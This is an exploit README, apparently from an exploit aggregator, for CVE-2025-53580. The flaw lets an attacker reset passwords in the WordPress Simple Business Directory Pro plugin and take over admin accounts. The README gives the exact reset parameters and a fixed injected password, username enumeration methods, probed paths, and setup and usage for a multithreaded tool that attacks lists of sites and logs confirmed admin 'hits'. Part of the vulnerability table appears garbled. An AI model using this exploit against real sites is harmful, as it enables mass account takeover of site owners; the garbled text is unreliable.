Share
## https://sploitus.com/exploit?id=F75E2F90-F935-54CF-AE40-169AB274E963
# CVE-2025-53580
WordPress Simple Business Directory Pro Plugin < 15.6.9 is vulnerable to a high priority Privilege Escalation
# CVE-2025-53580
### Simple Business Directory Pro β€” Incorrect Privilege Assignment β†’ Password Reset β†’ Admin Takeover

```
   ___  _        ___     __  __  __  ____     ____ ___  ____ __   __
  / (_)(_|   |_// (_)   /  )/  \/  )|        |    /   \|    /  \ /  \
 |       |   |  \__       /|    | / |___     |___   __/|___ \__/|    |
 |       |   |  /   -----/ |    |/      \-----   \    \    \/  \|    |
  \___/   \_/   \___/   /___\__//___\___/    \___/\___/\___/\__/ \__/
```

![CVE](https://img.shields.io/badge/CVE-2025--53580-critical?style=flat-square&color=8B0000)
![Plugin](https://img.shields.io/badge/Simple%20Business%20Directory%20Pro%20%3C%2015.6.9-555?style=flat-square)
![Auth](https://img.shields.io/badge/Auth-None-brightgreen?style=flat-square)
![Python](https://img.shields.io/badge/Python-3.8%2B-3776AB?style=flat-square&logo=python)
![Author](https://img.shields.io/badge/By-Nxploited-00aa55?style=flat-square)

---

## ❢ Vulnerability

| Field | Detail |
|---|---|
| **CVE** | CVE-2025-53580 |
| **Plugin** | quantumcloud Simple Business Directory Pro (`simple-business-directory-pro`) |
| **Affected** | All versions **                                          β”‚
β”‚       qcpd-restore-pwd      = restore                           β”‚
β”‚       qcpd-restore-pwd-type = user                              β”‚
β”‚       qcpd-uid              = 1  (then 2, then 3)              β”‚
β”‚       pass                  = NxploitedNX                       β”‚
β”‚                                                                 β”‚
β”‚  3. Enumerate usernames                                         β”‚
β”‚     /?author=1..9   β†’  redirect / body parse                    β”‚
β”‚     /wp-json/wp/v2/users  β†’  slug / username fields            β”‚
β”‚     hostname heuristic  +  "admin" fallback                     β”‚
β”‚                                                                 β”‚
β”‚  4. Login with injected password                                β”‚
β”‚     POST /wp-login.php  log=  pwd=NxploitedNX             β”‚
β”‚     Check: wordpress_logged_in cookie present                   β”‚
β”‚                                                                 β”‚
β”‚  5. Verify admin access (dual method)                           β”‚
β”‚     GET /wp-json/wp/v2/users/me  β†’  capabilities.manage_optionsβ”‚
β”‚     GET /wp-admin/users.php      β†’  adminmenu / users table     β”‚
β”‚                                                                 β”‚
β”‚  6. Write confirmed hit β†’ Nx_sbd_login_hits.txt                 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
```

---

## ❸ Setup

```bash
git clone https://github.com/Nxploited/CVE-2025-53580.git
cd CVE-2025-53580
pip install -r requirements.txt
```

**`requirements.txt`**
```
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
```

---

## ❹ Usage

```bash
python3 CVE-2025-53580.py
```

### Prompts

```
Targets list file (one host/URL per line) [list.txt]:   list.txt
Threads (concurrent sites) [3]:                         5
HTTP timeout (seconds) [10]:                            10
Successful hits file [Nx_sbd_login_hits.txt]:           Nx_sbd_login_hits.txt
```

> **Password injected for all reset attempts is fixed internally:**
> ```
> NxploitedNX
> ```

> **User IDs targeted per site:** `1`, `2`, `3` (configurable via `MAX_USER_ID`)

---

## ❺ Targets Format β€” `list.txt`

```
https://target1.com
target2.com
http://target3.com
```

---

## ❻ Candidate SBD Pages Probed

The tool scans **24 paths** per target looking for a page whose body contains `sbd`:

```
/login          /log-in         /signin         /sign-in
/user-login     /account/login  /restore        /password-reset
/reset-password /lost-password  /lostpassword   /user/restore
/my-account     /members/login  /member-login   /customer-login
/wp-login.php   /blog/login     /auth/login     /auth/restore
/sbd-login      /sbd-restore    /blog/log-in    /account/log-in
```

---

## ❼ Username Enumeration

| Method | Endpoint |
|---|---|
| Author redirect | `/?author=1` β†’ `/?author=9` |
| REST API | `/wp-json/wp/v2/users` β†’ `slug` + `username` |
| Hostname heuristic | First label of domain |
| Hardcoded fallback | `admin` always included |

---

## ❽ Admin Verification β€” Dual Method

Every successful login is verified through two independent checks before being written to disk:

**Method 1 β€” REST API:**
```
GET /wp-json/wp/v2/users/me
β†’ capabilities.manage_options = true  β†’  ADMIN CONFIRMED
```

**Method 2 β€” Dashboard:**
```
GET /wp-admin/users.php
β†’ adminmenu / users table markers present  β†’  ADMIN CONFIRMED
```

---

## ❾ Output File

**`Nx_sbd_login_hits.txt`**

```
[2025-06-01 14:22:10] https://target.com - type=ADMIN - user=admin
- login=/wp-login.php user=admin pass=NxploitedNX
- detail=ADMIN_CONFIRMED_REST(manage_options)

[2025-06-01 14:23:05] https://target2.com - type=USER - user=editor
- login=/wp-login.php user=editor pass=NxploitedNX
- detail=not_admin(rest_no_manage_options, wpadmin_no_strong_markers)
```

---

## ❿ Terminal Output Sample

```
[info]  https://target.com :: starting
[ok]    https://target.com :: found front-end sbd page at https://target.com/my-account
[info]  https://target.com :: starting qcpd-uid=1..3 brute with pass=NxploitedNX
[info]  https://target.com :: POST uid=1 β†’ status=302, Location=/my-account/?restored=1
[info]  https://target.com :: POST uid=2 β†’ status=302, Location=/my-account/?restored=1
[info]  https://target.com :: extracting usernames and trying login
[ok]    https://target.com :: login OK for user='admin', checking admin...
[ok]    https://target.com :: HIT for user='admin' β†’ admin=True,
        detail=ADMIN_CONFIRMED_REST(manage_options)

[warn]  https://target2.com :: no sbd page found in candidate restore paths, skipping
```

---

## β“« Author

```
Nxploited (Khaled Alenazi)
GitHub   β†’  https://github.com/Nxploited
Telegram β†’  @KNxploited
```

[![GitHub](https://img.shields.io/badge/GitHub-Nxploited-181717?style=for-the-badge&logo=github)](https://github.com/Nxploited)
[![Telegram](https://img.shields.io/badge/Telegram-@KNxploited-2CA5E0?style=for-the-badge&logo=telegram)](https://t.me/KNxploited)

---

## ⓬ Disclaimer

```
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.
```

---

Β© 2025 Nxploited Β· Simple Business Directory Pro